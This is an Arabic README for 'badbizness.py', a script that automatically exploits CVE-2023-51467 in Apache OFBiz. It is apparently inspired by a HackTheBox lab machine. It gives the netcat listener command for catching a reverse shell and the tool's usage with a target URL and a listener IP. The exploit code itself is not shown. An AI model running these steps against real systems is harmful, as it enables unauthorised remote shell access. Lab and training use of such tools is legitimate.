
نص برمجي للاستغلال التلقائي لإطار عمل الويب جافا OF Biz ضمن ثغرة CVE-2023-51467.

سكربت استغلال تلقائي لإطار عمل الويب جافا OF Biz ضمن ثغرة CVE-2023-51467. مستوحى من جهاز HackTheBox Bizness.
يتطلب هذا السكربت أداة ysoserial وإصدار OpenJDK 11. راجع قائمة الاستخدام للتثبيت.
قم بإعداد مستمع لالتقاط الصدفة بالطريقة التي تفضلها. إليك مثال باستخدام netcat:
nc -nlvp 1337
نفّذ السكربت:
python3 badbizness.py [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
أُنشئت هذه الأداة كوسيلة لتعلم المزيد عن بايثون. أنسب الفضل إلى هذا السكربت لمساعدتي بشكل شامل.